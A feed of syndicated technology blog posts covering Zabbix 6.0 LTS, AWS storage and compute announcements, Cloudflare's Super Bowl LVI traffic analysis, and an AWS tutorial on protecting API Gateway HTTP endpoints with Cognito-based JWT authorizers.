Security updates for Tuesday

Post Syndicated from original https://lwn.net/Articles/884829/

Security updates have been issued by Debian (h2database), Fedora (dotnet-build-reference-packages, dotnet3.1, and firefox), Oracle (.NET 5.0, firefox, kernel, and kernel-container), Red Hat (firefox), Scientific Linux (firefox), SUSE (unbound), and Ubuntu (firefox).

Zabbix 6.0 LTS is out now!

Post Syndicated from Arturs Lontons original https://blog.zabbix.com/zabbix-6-0-lts-is-out-now/18757/

The Zabbix team is proud to announce the release of Zabbix 6.0 LTS. The latest version comes packed with many new features, improvements, new templates and integrations.

New features

  • Out-of-the-box High Availability cluster for Zabbix server with support for one or multiple standby nodes
  • Redesigned Services section, tailored for flexible Business Service monitoring with the ability to monitor over 100k services, define flexible service calculation rules, perform root cause analysis, receive service status change alerts, and more
  • New machine learning trend functions for baseline monitoring and anomaly detection
  • Monitor your Kubernetes instance with out-of-the-box Kubernetes monitoring for pods, nodes, and Kubernetes component monitoring
  • New Audit log schema enables detailed logging for both the Zabbix frontend and backend
  • Track your host status and location with the new Geomap widget
  • The Top hosts widget provides Top N and Bottom N host views sorted by item values
  • Ability to define custom Zabbix password complexity requirements
  • Multiple UI improvements. Hosts can now be created directly from the Monitoring section.
  • Zabbix Agent2 now supports loading stand-alone plugins without having to recompile the Agent2
  • Monitor SSL/TLS certificates with a new Zabbix Agent2 item
  • Performance improvements for Zabbix Server, Proxy, and Frontend
  • All of the official Zabbix templates are now stand-alone and do not require importing additional template dependencies

  • And many other improvements and features

 

This version also provides a set of new templates for the following vendors:

  • F5 BIG-IP

  • Cisco ASAv

  • HPE ProLiant servers

  • Cloudflare

  • InfluxDB

  • Travis CI

  • Dell PowerEdge

  • pfSense

  • Kubernetes

  • Mikrotik

  • Nginx Plus

  • VMware SD-WAN VeloCloud

  • GridGain

  • Systemd

  • As well as a new Github webhook integration

The latest LTS release will receive full official support for 3 years and limited support, which consists of bug fixes for 5 years.

Find out more about Zabbix 6.0 LTS by visiting our What’s new in Zabbix 6.0 LTS webinar, covering the most important new features and improvements: https://www.zabbix.com/webinars

An overview of the new features and changes can be found on our What’s new in Zabbix 6.0 page:

https://www.zabbix.com/whats_new_6_0

What’s new in Zabbix 6.0.0 documentation section:

https://www.zabbix.com/documentation/current/en/manual/introduction/whatsnew600

Take a look at the release notes to see the full list of new features and improvements:

https://www.zabbix.com/rn/rn6.0.0

Zabbix 6.0 LTS packages

The official Zabbix packages are available for:

  • Linux distributions for different hardware platforms on RHEL, CentOS, Oracle Linux, Debian, SuSE, Ubuntu, Raspbian
  • Virtualization platforms based on VMWare, VirtualBox, Hyper-V, XEN
  • Docker
  • Packages and pre-compiled agents for most popular platforms, including macOS and MSI packages for Windows

You can find the download instructions and download the new version on the download page: https://www.zabbix.com/download

One-click deployment is available for the following cloud platforms:

  • AWS, Azure, Google Cloud, Digital Ocean, Linode, Oracle Cloud, Red Hat OpenShift, Yandex Cloud

Zabbix 6.0 also incorporates the features added in Zabbix 5.2 and Zabbix 5.4 non-LTS versions.

Upgrading to Zabbix 6.0 LTS

In order to upgrade to Zabbix 6.0 LTS, you need to upgrade your repository package and download and install the new Zabbix component packages (Zabbix server, proxy, frontend, and other Zabbix components). When you start the Zabbix Server, an automatic database schema upgrade will be performed. Zabbix Agents are backward compatible; therefore, it is not required to install the new agent versions. You can do it at a later time if needed.

If you’re using the official Docker container images – simply deploy a new set of containers for your Zabbix components. Once the Zabbix server container connects to the backend database, the database upgrade will be performed automatically.

You can find step-by-step instructions for the upgrade process to Zabbix 6.0 LTS in the Zabbix documentation.

If you’re interested in a list of changes and an additional pre-upgrade checklist – the following blog post covers the nuances of the upgrade process and takes a look under the hood at what changes are performed during the upgrade.

The post Zabbix 6.0 LTS is out now! appeared first on Zabbix Blog.

Amazon Elastic File System Update – Sub-Millisecond Read Latency

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/amazon-elastic-file-system-update-sub-millisecond-read-latency/

Amazon Elastic File System (Amazon EFS) was announced in early 2015 and became generally available in 2016. We launched EFS in order to make it easier for you to build applications that need shared access to file data. EFS is (and always has been) simple and serverless: you simply create a file system, attach it to any number of EC2 instances, Lambda functions, or containers, and go about your work. EFS is highly durable and scalable, and gives you a strong read-after-write consistency model.

Since the 2016 launch we have added many new features and capabilities including encryption data at rest and in transit, an Infrequent Access storage class, and several other lower cost storage classes. We have also worked to improve performance, delivering a 400% increase in read operations per second, a 100% increase in per-client throughput, and then a further tripling of read throughput.

Our customers use EFS file systems to support many different applications and use cases including home directories, build farms, content management (WordPress and Drupal), DevOps (Git, GitLab, Jenkins, and Artifactory), and machine learning inference, to name a few of each.

Sub-Millisecond Read Latency
Faster is always better, and today I am thrilled to be able to tell you that your latency-sensitive EFS workloads can now run about twice as fast as before!

Up until today, EFS latency for read operations (both data and metadata) was typically in the low single-digit milliseconds. Effective today, new and existing EFS file systems now provide average latency as low as 600 microseconds for the majority of read operations on data and metadata.

This performance boost applies to One Zone and Standard General Purpose EFS file systems. New or old, you will still get the same availability, durability, scalability, and strong read-after-write consistency that you have come to expect from EFS, at no additional cost and with no configuration changes.

We “flipped the switch” and enabled this performance boost for all existing EFS General Purpose mode file systems over the course of the last few weeks, so you may already have noticed the improvement. Of course, any new file systems that you create will also benefit.

Learn More
To learn more about the performance characteristics of EFS, read Amazon EFS Performance.

Jeff;

PS – Our multi-year roadmap contains a bunch of short-term and long-term performance enhancements, so stay tuned for more good news!

New – Amazon EC2 C6a Instances Powered By 3rd Gen AMD EPYC Processors for Compute-Intensive Workloads

Post Syndicated from Channy Yun original https://aws.amazon.com/blogs/aws/new-amazon-ec2-c6a-instances-powered-by-3rd-gen-amd-epyc-processors-for-compute-intensive-workloads/

At AWS re:Invent 2021, we launched Amazon EC2 M6a instances powered by the 3rd Gen AMD EPYC processors, running at frequencies up to 3.6 GHz, which offer customers up to 35 percent improvement in price-performance compared to M5a instances.

Many customers are looking for ways to optimize their cloud utilization, and they are taking advantage of the compute choice that Amazon EC2 offers. Customers such as Dropbox, Capital One, and Sprinklr have been able to realize the cost benefits of AWS using EC2 instances powered by AMD EPYC processors.

Today, I am happy to announce the availability of the new compute-optimized Amazon EC2 C6a instances, which offer up to up to 15 percent improvement in price-performance versus C5a instances, and 10 percent lower cost than comparable x86-based EC2 instances.

These instances are ideal for running compute-intensive workloads such as high-performance web servers, batch processing, ad serving, machine learning, multi-player gaming, video encoding, high performance computing (HPC) such as scientific modeling, and machine learning.

Compared to C5a instances, this new instance type provides:

To increase instance security, C6a instances have always-on memory encryption with AMD Transparent Single Key Memory Encryption (TSME), and support new AVX2 instructions for accelerating encryption and decryption algorithms.

Like M6a, C6a instances are also available in 10 sizes:

Name vCPUs Memory
(GiB)
Network Bandwidth
(Gbps)
EBS Throughput
(Gbps)
c6a.large 2 4 Up to 12.5 Up to 6.6
c6a.xlarge 4 8 Up to 12.5 Up to 6.6
c6a.2xlarge 8 16 Up to 12.5 Up to 6.6
c6a.4xlarge 16 32 Up to 12.5 Up to 6.6
c6a.8xlarge 32 64 12.5 6.6
c6a.12xlarge 48 96 18.75 10
c6a.16xlarge 64 128 25 13.3
c6a.24xlarge 96 192 37.5 20
c6a.32xlarge 128 256 50 26.6
c6a.48xlarge 192 384 50 40

The new instances are built on the AWS Nitro System, a collection of building blocks that offloads many of the traditional virtualization functions to dedicated hardware for high performance, high availability, and highly secure cloud instances.

Available Now
C6a instances are available today in three AWS Regions: US East (N. Virginia), US West (Oregon), and EU (Ireland). As usual with EC2, you pay for what you use. For more information, see the EC2 pricing page.

To learn more, visit the EC2 C6a instance and AWS/AMD partner page. You can send feedback to  [email protected]AWS re:Post for EC2, or through your usual AWS Support contacts.

Channy

Who won Super Bowl LVI? A look at Internet traffic during the big game

Post Syndicated from João Tomé original https://blog.cloudflare.com/who-won-super-bowl-lvi-a-look-at-internet-traffic-during-the-big-game/

Who won Super Bowl LVI? A look at Internet traffic during the big game

“It’s ridiculous for a country to get all worked up about a game—except the Super Bowl, of course. Now that’s important.”
Andy Rooney, American radio and television writer

Who won Super Bowl LVI? A look at Internet traffic during the big game

When the Super Bowl is on, there are more winners than just one of the teams playing, especially when we look at Internet trends. By now, everyone knows that the Los Angeles Rams won, but we also want to look at which Super Bowl advertisers were the biggest winners, and how traffic to food delivery services, social media and messaging apps, and sports and betting websites changed throughout the game.

We covered some of these questions during our Super Bowl live-tweeting on our Cloudflare Radar account. (Hint: follow us if you’re interested in Internet trends).

Cloudflare Radar uses a variety of sources to provide aggregate information about Internet traffic and attack trends. In this blog post, as we did last year, we use DNS name resolution data to estimate traffic to websites. We can’t see who visited the websites mentioned, or what anyone did on the websites, but DNS can give us an estimate of the interest generated by the ads or across a set of sites in the categories listed above.

The baseline value for the charts was calculated by taking the mean traffic level for the associated websites during 12:00 – 15:00 EST on Super Bowl Sunday (February 13, 2022).

The Big Picture

Focusing on the two teams that made it to the big game and to get the ball rolling already, the Bengals website had some spikes before kickoff and during the second half, but the Rams website had a great run and just like on the field, had their biggest peak at the end.


Super Bowl Sunday is not only about the ads – part of the excitement around watching the game with friends and family is having a great assortment of food and snacks. So, let’s start with the aggregated traffic to a set of food delivery services that clearly builds to a peak around 17:30, one hour before kickoff. After that, traffic generally decreases but increases slightly after the second half starts.

Who won Super Bowl LVI? A look at Internet traffic during the big game

When we look at traffic to sports websites, there’s a build up to a peak as the game began at 18:30.

As the game progressed, traffic dropped off, but spiked three times during halftime (between 20:00 and 20:30). After the Rams victory was assured, traffic to those websites saw a final peak.

Who won Super Bowl LVI? A look at Internet traffic during the big game

We can also see below that aggregated traffic to video platforms had a pattern similar to sports websites, with two peaks at halftime and a third notable one at the end of the game. After kickoff (18:30) the first peak occurred around the same time Coinbase’s bouncing QR code commercial aired.

Who won Super Bowl LVI? A look at Internet traffic during the big game

How about social media? Aggregate traffic to social media sites started to decrease after 17:00, hitting its lowest point just before kickoff.

During the game, there was a clear spike (the biggest of the afternoon/evening) after the Coinbase QR code ad aired. At halftime, social media traffic dropped off before peaking again right before the second half started. A final peak occurred after the game ended.

Who won Super Bowl LVI? A look at Internet traffic during the big game

Finally, let’s look at messaging services. Among this set of domains, there wasn’t as much of a decrease as we saw in social media heading into kickoff, but there was a spike around 19:00 after the second batch of commercials was aired. Traffic continued to grow through halftime and into the third quarter before starting to drop heading towards the end of the game. Similar to several of the other categories above, messaging traffic again rose after the end of the game.

Who won Super Bowl LVI? A look at Internet traffic during the big game

The Internet Impact of Commercials

Historically, many people have watched the Super Bowl as much for the ads as the actual football game. (Maybe even more so some years…) Many of the advertisements are now posted online ahead of Super Bowl Sunday. Given that, do these commercials still drive traffic to the company’s web site while the game is on?” As we saw in 2021, the answer remains a resounding yes.

The first Bud Light ad during the game (at 18:52) drove a more than 25x increase to their site, and the Bud Light Seltzer Hard Soda ad with Guy Fieri at 21:00 drove a second peak in traffic, with a 15x increase over baseline.

Who won Super Bowl LVI? A look at Internet traffic during the big game

The Pringles commercial (at 21:00), where a hand stuck in a Pringles can really stuck with viewers, resulted in a greater than 35x increase. On the other hand, Lays got a 30x bump in traffic from their wedding memories ad at 20:53.

Who won Super Bowl LVI? A look at Internet traffic during the big game

The Doritos website had already experienced some spikes throughout the afternoon, but jungle animals singing the Salt-N-Pepa hit ‘Push It’  (19:13) drove a more than 12x increase in traffic. However, last year’s ad with a flat virtual Matthew McConaughey seemed to have more impact.

Who won Super Bowl LVI? A look at Internet traffic during the big game

Brands that might not be so well known often get a large traffic boost from their Super Bowl commercials. For example, the cocktail company Cutwater Spirits “here’s to the lazy ones” ad, their first at the Super Bowl, resulted in an 800x increase in traffic. (The Michelob Ultra bowling ad with Peyton Manning drive a similar increase in traffic.:

Who won Super Bowl LVI? A look at Internet traffic during the big game

Financial services: the QR code

We already saw that the Coinbase ad seems to have made social media tick up after its ad aired, but what about traffic to them? The ad drove a 14x increase in traffic. (However, it is worth noting that scanning the QR code in the advertisement took viewers to drops.coinbase.com – this specific hostname is not included in the traffic analyzed for this graph.)

Who won Super Bowl LVI? A look at Internet traffic during the big game

In comparison, the Crypto.com ad featuring LeBron James having a conversation with his 2003 self generated a 3x increase in traffic to their website, while the FTX ad where Larry David gives bad advice through human history only resulted in 1.5x traffic growth.

Who won Super Bowl LVI? A look at Internet traffic during the big game

On the other hand, the eToro “to the moon” ad that ran during the second half of the game drove a 25x increase in traffic (at halftime there was another 20x bump).

Who won Super Bowl LVI? A look at Internet traffic during the big game

In the classic financial services world, there was another kid on the block that experienced a much bigger bump (140x) in traffic growth. The Greenlight ad featuring Modern Family’s Phil Dunphy’s (Ty Burrell) purchasing habits aired late in the game, (21:45) but clearly made an impact.

Who won Super Bowl LVI? A look at Internet traffic during the big game

Electric cars (Dr. Evil) takeover

Car commercials have aired for many years during the Super Bowl, teasing new models and technologies. In 2022, electric cars were (again) a popular subject of Super Bowl ads. Bending modern day, 80’s nostalgia, and ancient mythology, BMW rocked down to Electric Avenue as their ad (18:54) resulted in a 14x increase over baseline in traffic.

Who won Super Bowl LVI? A look at Internet traffic during the big game

However, our data showed that there was a clear winner among automobile makers: the Dr. Evil (one of Mike Myers’s characters from Austin Powers) takeover of General Motors ad drove traffic to a peak of over 400x above baseline.

Who won Super Bowl LVI? A look at Internet traffic during the big game

Ads from other car vendors including Toyota (5x), Kia (16x), Vroom (70x), Nissan (30x) also generated attention and increased traffic to their websites. Highlighting the importance of charging to the electric car ecosystem, the first ever Super Bowl ad from Wallbox (a manufacturer of electric car chargers) powered a huge increase in traffic to their website, reaching a peak over 2,500x higher than baseline.

Who won Super Bowl LVI? A look at Internet traffic during the big game

Last but not least

One of the health-related products that had made its mark on the Super Bowl was the early detection medical service Hologic that featured Mary J. Blige. They experienced a 140x traffic spike.

Who won Super Bowl LVI? A look at Internet traffic during the big game

Another example that really showed that having a successful Super Bowl commercial doesn’t stink was for Irish Spring soap. Their good ‘smelling’ ad drove a traffic increase to their website of nearly 200x over baseline.

Who won Super Bowl LVI? A look at Internet traffic during the big game

Among ads for travel-related companies, the biggest increase in traffic we saw was from Booking.com (21:23), with the adventures of Idris Elba gaining them a 1.6x bump.

Who won Super Bowl LVI? A look at Internet traffic during the big game

Several ads promoted shows and movie trailers, including Dr. Strange 2 and Amazon Prime Video’s The Rings of Power, but the trailer for Jordan Peele’s Nope movie generated a nearly 40x increase in traffic.

Who won Super Bowl LVI? A look at Internet traffic during the big game

And the winner is…

Popular smart home gadgets appeared to be jealous of the new COVID-19 testing device from Cue Health, but Super Bowl viewers were clearly curious about it. The company’s ad drove an astronomical 10,000x increase in traffic to their website after it aired.

Who won Super Bowl LVI? A look at Internet traffic during the big game

Conclusion

We saw again that when humans change their behavior that impacts the Internet traffic (the network of networks is, after all, a human invention for humans).

Remember, visit Cloudflare Radar for up to date Internet traffic and attack trends and follow the Cloudflare Radar Twitter account for regular insights on Internet events.

Who won Super Bowl LVI? A look at Internet traffic during the big game

How to secure API Gateway HTTP endpoints with JWT authorizer

Post Syndicated from Siva Rajamani original https://aws.amazon.com/blogs/security/how-to-secure-api-gateway-http-endpoints-with-jwt-authorizer/

This blog post demonstrates how you can secure Amazon API Gateway HTTP endpoints with JSON web token (JWT) authorizers. Amazon API Gateway helps developers create, publish, and maintain secure APIs at any scale, helping manage thousands of API calls. There are no minimum fees, and you only pay for the API calls you receive.

Based on customer feedback and lessons learned from building the REST and WebSocket APIs, AWS launched HTTP APIs for Amazon API Gateway, a service built to be fast, low cost, and simple to use. HTTP APIs offer a solution for building APIs, as well as multiple mechanisms for controlling and managing access through AWS Identity and Access Management (IAM) authorizers, AWS Lambda authorizers, and JWT authorizers.

This post includes step-by-step guidance for setting up JWT authorizers using Amazon Cognito as the identity provider, configuring HTTP APIs to use JWT authorizers, and examples to test the entire setup. If you want to protect HTTP APIs using Lambda and IAM authorizers, you can refer to Introducing IAM and Lambda authorizers for Amazon API Gateway HTTP APIs.

Prerequisites

Before you can set up a JWT authorizer using Cognito, you first need to create three Lambda functions. You should create each Lambda function using the following configuration settings, permissions, and code:

  1. The first Lambda function (Pre-tokenAuthLambda) is invoked before the token generation, allowing you to customize the claims in the identity token.
  2. The second Lambda function (LambdaForAdminUser) acts as the HTTP API Gateway integration target for /AdminUser HTTP API resource route.
  3. The third Lambda function (LambdaForRegularUser) acts as the HTTP API Gateway integration target for /RegularUser HTTP API resource route.

IAM policy for Lambda function

You first need to create an IAM role using the following IAM policy for each of the three Lambda functions:

	{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Effect": "Allow",
			"Action": "logs:CreateLogGroup",
			"Resource": "arn:aws:logs:us-east-1:<AWS Account Number>:*"
		},
		{
			"Effect": "Allow",
			"Action": [
				"logs:CreateLogStream",
				"logs:PutLogEvents"
			],
			"Resource": [
				"arn:aws:logs:us-east-1:<AWS Account Number>:log-group:/aws/lambda/<Name of the Lambda functions>:*"
			]
		}
	]
} 

Settings for the required Lambda functions

For the three Lambda functions, use these settings:

Function name Enter an appropriate name for the Lambda function, for example:

  • Pre-tokenAuthLambda for the first Lambda
  • LambdaForAdminUser for the second
  • LambdaForRegularUser for the third
Runtime

Choose Node.js 12.x

Permissions Choose Use an existing role and select the role you created with the IAM policy in the Prerequisites section above.

Pre-tokenAuthLambda code

This first Lambda code, Pre-tokenAuthLambda, converts the authenticated user’s Cognito group details to be returned as the scope claim in the id_token returned by Cognito.

	exports.lambdaHandler = async (event, context) => {
		let newScopes = event.request.groupConfiguration.groupsToOverride.map(item => `${item}-${event.callerContext.clientId}`)
	event.response = {
		"claimsOverrideDetails": {
			"claimsToAddOrOverride": {
				"scope": newScopes.join(" "),
			}
		}
  	};
  	return event
}

LambdaForAdminUser code

This Lambda code, LambdaForAdminUser, acts as the HTTP API Gateway integration target and sends back the response Hello from Admin User when the /AdminUser resource path is invoked in API Gateway.

	exports.handler = async (event) => {

		const response = {
			statusCode: 200,
			body: JSON.stringify('Hello from Admin User'),
		};
		return response;
	};

LambdaForRegularUser code

This Lambda code, LambdaForRegularUser , acts as the HTTP API Gateway integration target and sends back the response Hello from Regular User when the /RegularUser resource path is invoked within API Gateway.

	exports.handler = async (event) => {

		const response = {
			statusCode: 200,
			body: JSON.stringify('Hello from Regular User'),
		};
		return response;
	};

Deploy the solution

To secure the API Gateway resources with JWT authorizer, complete the following steps:

  1. Create an Amazon Cognito User Pool with an app client that acts as the JWT authorizer
  2. Create API Gateway resources and secure them using the JWT authorizer based on the configured Amazon Cognito User Pool and app client settings.

The procedures below will walk you through the step-by-step configuration.

Set up JWT authorizer using Amazon Cognito

The first step to set up the JWT authorizer is to create an Amazon Cognito user pool.

To create an Amazon Cognito user pool

  1. Go to the Amazon Cognito console.
  2. Choose Manage User Pools, then choose Create a user pool.
    Figure 1: Create a user pool

    Figure 1: Create a user pool

  3. Enter a Pool name, then choose Review defaults.
    Figure 2: Review defaults while creating the user pool

    Figure 2: Review defaults while creating the user pool

  4. Choose Add app client.
    Figure 3: Add an app client for the user pool

    Figure 3: Add an app client for the user pool

  5. Enter an app client name. For this example, keep the default options. Choose Create app client to finish.
    Figure 4: Review the app client configuration and create it

    Figure 4: Review the app client configuration and create it

  6. Choose Return to pool details, and then choose Create pool.
    Figure 5: Complete the creation of user pool setup

    Figure 5: Complete the creation of user pool setup

To configure Cognito user pool settings

Now you can configure app client settings:

  1. On the left pane, choose App client settings. In Enabled Identity Providers, select the identity providers you want for the apps you configured in the App Clients tab.
  2. Enter the Callback URLs you want, separated by commas. These URLs apply to all selected identity providers.
  3. Under OAuth 2.0, select the from the following options.
    • For Allowed OAuth Flows, select Authorization code grant.
    • For Allowed OAuth Scopes, select phone, email, openID, and profile.
  4. Choose Save changes.
    Figure 6: Configure app client settings

    Figure 6: Configure app client settings

  5. Now add the domain prefix to use for the sign-in pages hosted by Amazon Cognito. On the left pane, choose Domain name and enter the appropriate domain prefix, then Save changes.
    Figure 7: Choose a domain name prefix for the Amazon Cognito domain

    Figure 7: Choose a domain name prefix for the Amazon Cognito domain

  6. Next, create the pre-token generation trigger. On the left pane, choose Triggers and under Pre Token Generation, select the Pre-tokenAuthLambda Lambda function you created in the Prerequisites procedure above, then choose Save changes.
    Figure 8: Configure Pre Token Generation trigger Lambda for user pool

    Figure 8: Configure Pre Token Generation trigger Lambda for user pool

  7. Finally, create two Cognito groups named admin and regular. Create two Cognito users named adminuser and regularuser. Assign adminuser to both admin and regular group. Assign regularuser to regular group.
    Figure 9: Create groups and users for user pool

    Figure 9: Create groups and users for user pool

Configuring HTTP endpoints with JWT authorizer

The first step to configure HTTP endpoints is to create the API in the API Gateway management console.

To create the API

  1. Go to the API Gateway management console and choose Create API.
    Figure 10: Create an API in API Gateway management console

    Figure 10: Create an API in API Gateway management console

  2. Choose HTTP API and select Build.
    Figure 11: Choose Build option for HTTP API

    Figure 11: Choose Build option for HTTP API

  3. Under Create and configure integrations, enter JWTAuth for the API name and choose Review and Create.
    Figure 12: Create Integrations for HTTP API

    Figure 12: Create Integrations for HTTP API

  4. Once you’ve created the API JWTAuth, choose Routes on the left pane.
    Figure 13: Navigate to Routes tab

    Figure 13: Navigate to Routes tab

  5. Choose Create a route and select GET method. Then, enter /AdminUser for the path.
    Figure 14: Create the first route for HTTP API

    Figure 14: Create the first route for HTTP API

  6. Repeat step 5 and create a second route using the GET method and /RegularUser for the path.
    Figure 15: Create the second route for HTTP API

    Figure 15: Create the second route for HTTP API

To create API integrations

  1. Now that the two routes are created, select Integrations from the left pane.
    Figure 16: Navigate to Integrations tab

    Figure 16: Navigate to Integrations tab

  2. Select GET for the /AdminUser resource path, and choose Create and attach an integration.
    Figure 17: Attach an integration to first route

    Figure 17: Attach an integration to first route

  3. To create an integration, select the following values

    Integration type: Lambda function
    Integration target: LambdaForAdminUser

  4. Choose Create.
    NOTE: LambdaForAdminUser is the Lambda function you previously created as part of the Prerequisites procedure LambdaForAdminUser code.
    Figure 18: Create an integration for first route

    Figure 18: Create an integration for first route

  5. Next, select GET for the /RegularUser resource path and choose Create and attach an integration.
    Figure 19: Attach an integration to second route

    Figure 19: Attach an integration to second route

  6. To create an integration, select the following values

    Integration type: Lambda function
    Integration target: LambdaForRegularUser

  7. Choose Create.
    NOTE: LambdaForRegularUser is the Lambda function you previously created as part of the Prerequisites procedure LambdaForRegularUser code.
    Figure 20: Create an integration for the second route

    Figure 20: Create an integration for the second route

To configure API authorization

  1. Select Authorization from the left pane, select /AdminUser path and choose Create and attach an authorizer.
    Figure 21: Navigate to Authorization left pane option to create an authorizer

    Figure 21: Navigate to Authorization left pane option to create an authorizer

  2. For Authorizer type select JWT and under Authorizer settings enter the following details:

    Name: JWTAuth
    Identity source: $request.header.Authorization
    Issuer URL: https://cognito-idp.us-east1.amazonaws.com/<your_userpool_id>
    Audience: <app_client_id_of_userpool>
  3. Choose Create.
    Figure 22: Create and attach an authorizer to HTTP API first route

    Figure 22: Create and attach an authorizer to HTTP API first route

  4. In the Authorizer for route GET /AdminUser screen, choose Add scope in the Authorization Scope section and enter scope name as admin-<app_client_id> and choose Save.
    Figure 23: Add authorization scopes to first route of HTTP API

    Figure 23: Add authorization scopes to first route of HTTP API

  5. Now select the /RegularUser path and from the dropdown, select the JWTAuth authorizer you created in step 3. Choose Attach authorizer.
    Figure 24: Attach an authorizer to HTTP API second route

    Figure 24: Attach an authorizer to HTTP API second route

  6. Choose Add scope and enter the scope name as regular-<app_client_id> and choose Save.
    Figure 25: Add authorization scopes to second route of HTTP API

    Figure 25: Add authorization scopes to second route of HTTP API

  7. Enter Test as the Name and then choose Create.
    Figure 26: Create a stage for HTTP API

    Figure 26: Create a stage for HTTP API

  8. Under Select a stage, enter Test, and then choose Deploy to stage.
    Figure 27: Deploy HTTP API to stage

    Figure 27: Deploy HTTP API to stage

Test the JWT authorizer

You can use the following examples to test the API authentication. We use Curl in this example, but you can use any HTTP client.

To test the API authentication

  1. Send a GET request to the /RegularUser HTTP API resource without specifying any authorization header.
    curl -s -X GET https://a1b2c3d4e5.execute-api.us-east-1.amazonaws.com/RegularUser

    API Gateway returns a 401 Unauthorized response, as expected.

    {“message”:”Unauthorized”}

  2. The required $request.header.Authorization identity source is not provided, so the JWT authorizer is not called. Supply a valid Authorization header key and value. You authenticate as the regularuser, using the aws cognito-idp initiate-auth AWS CLI command.
    aws cognito-idp initiate-auth --auth-flow USER_PASSWORD_AUTH --client-id <Cognito User Pool App Client ID> --auth-parameters USERNAME=regularuser,PASSWORD=<Password for regularuser>

    CLI Command response:

    
    {
    	"ChallengeParameters": {},
    	"AuthenticationResult": {
    		"AccessToken": "6f5e4d3c2b1a111112222233333xxxxxzz2yy",
    		"ExpiresIn": 3600,
    		"TokenType": "Bearer",
    		"RefreshToken": "xyz123abc456dddccc0000",
    		"IdToken": "aaabbbcccddd1234567890"
    	}
    }

    The command response contains a JWT (IdToken) that contains information about the authenticated user. This information can be used as the Authorization header value.

    curl -H "Authorization: aaabbbcccddd1234567890" -s -X GET https://a1b2c3d4e5.execute-api.us-east-1.amazonaws.com/RegularUser

  3. API Gateway returns the response Hello from Regular User. Now test access for the /AdminUser HTTP API resource with the JWT token for the regularuser.
    curl -H "Authorization: aaabbbcccddd1234567890" -s -X GET "https://a1b2c3d4e5.execute-api.us-east-1.amazonaws.com/AdminUser"

    API Gateway returns a 403 – Forbidden response.
    {“message”:”Forbidden”}
    The JWT token for the regularuser does not have the authorization scope defined for the /AdminUser resource, so API Gateway returns a 403 – Forbidden response.

  4. Next, log in as adminuser and validate that you can successfully access both /RegularUser and /AdminUser resource. You use the cognito-idp initiate-auth AWS CLI command.
  5. aws cognito-idp initiate-auth --auth-flow USER_PASSWORD_AUTH --client-id <Cognito User Pool App Client ID> --auth-parameters USERNAME=adminuser,PASSWORD==<Password for adminuser>

    CLI Command response:

    
    {
    	"ChallengeParameters": {},
    	"AuthenticationResult": {
    		"AccessToken": "a1b2c3d4e5c644444555556666Y2X3Z1111",
    		"ExpiresIn": 3600,
    		"TokenType": "Bearer",
    		"RefreshToken": "xyz654cba321dddccc1111",
    		"IdToken": "a1b2c3d4e5c6aabbbcccddd"
    	}
    }

  6. Using Curl, you can validate that the adminuser JWT token now has access to both the /RegularUser resource and the /AdminUser resource. This is possible when adminuser is part of both Cognito groups, so the JWT token contains both authorization scopes.
    curl -H "Authorization: a1b2c3d4e5c6aabbbcccddd" -s -X GET https://a1b2c3d4e5.execute-api.us-east-1.amazonaws.com/RegularUser

    API Gateway returns the response Hello from Regular User

    curl -H "Authorization: a1b2c3d4e5c6aabbbcccddd" -s -X GET https://a1b2c3d4e5.execute-api.us-east-1.amazonaws.com/AdminUser

    API Gateway returns the following response Hello from Admin User

Conclusion

AWS enabled the ability to manage access to an HTTP API in API Gateway in multiple ways: with Lambda authorizers, IAM roles and policies, and JWT authorizers. This post demonstrated how you can secure API Gateway HTTP API endpoints with JWT authorizers. We configured a JWT authorizer using Amazon Cognito as the identity provider (IdP). You can achieve the same results with any IdP that supports OAuth 2.0 standards. API Gateway validates the JWT that the client submits with API requests. API Gateway allows or denies requests based on token validation along with the scope of the token. You can configure distinct authorizers for each route of an API, or use the same authorizer for multiple routes.

To learn more, we recommend:

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Author

Siva Rajamani

Siva is a Boston-based Enterprise Solutions Architect. He enjoys working closely with customers and supporting their digital transformation and AWS adoption journey. His core areas of focus are Serverless, Application Integration, and Security.

Author

Sudhanshu Malhotra

Sudhanshu is a Boston-based Enterprise Solutions Architect for AWS. He’s a technology enthusiast who enjoys helping customers find innovative solutions to complex business challenges. His core areas of focus are DevOps, Machine Learning, and Security. When he’s not working with customers on their journey to the cloud, he enjoys reading, hiking, and exploring new cuisines.

Author

Rajat Mathur

Rajat is a Sr. Solutions Architect at Amazon Web Services. Rajat is a passionate technologist who enjoys building innovative solutions for AWS customers. His core areas of focus are IoT, Networking and Serverless computing. In his spare time, Rajat enjoys long drives, traveling and spending time with family.

[$] Going big with TCP packets

Post Syndicated from original https://lwn.net/Articles/884104/

Like most components in the computing landscape, networking hardware has
grown steadily faster over time. Indeed, today’s high-end network
interfaces can often move data more quickly than the systems they are
attached to can handle. The networking developers have been working for
years to increase the scalability of their subsystem; one of the current
projects is the
BIG TCP patch set
from Eric Dumazet and Coco Li. BIG TCP isn’t for
everybody, but it has the potential to significantly improve networking
performance in some settings.

Upcoming Speaking Engagements

Post Syndicated from Schneier.com Webmaster original https://www.schneier.com/blog/archives/2022/02/upcoming-speaking-engagements-17.html

This is a current list of where and when I am scheduled to speak:

  • I’m speaking at IT-S Now 2022 in Vienna on June 2, 2022.
  • I’m speaking at the 14th International Conference on Cyber Conflict, CyCon 2022, in Tallinn, Estonia on June 3, 2022.
  • I’m speaking at the RSA Conference 2022 in San Francisco, June 6-9, 2022.

The list is maintained on this page.

Running IBM MQ on AWS using High-performance Amazon FSx for NetApp ONTAP

Post Syndicated from Senthil Nagaraj original https://aws.amazon.com/blogs/architecture/running-ibm-mq-on-aws-using-high-performance-amazon-fsx-for-netapp-ontap/

Many Amazon Web Services (AWS) customers use IBM MQ on-premises and are looking to migrate it to the AWS Cloud. For persistent storage requirements with IBM MQ on AWS, Amazon Elastic File System (Amazon EFS) can be used for distributed storage and to provide high availability. The AWS QuickStart to deploy IBM MQ with Amazon EFS is an architecture used for applications where the file system throughput requirements are within the Amazon EFS limits.

However, there are scenarios where customers need increased capacity for their IBM MQ workloads. These could be applications that rely heavily on IBM MQ, which result in a much higher message data throughput. This means that the persistent messages must be written to and read from the shared file system more frequently. IBM MQ facilitates writing log information into the shared file system. These are two such situations where such application requirements translate to a higher number of read/write operations.

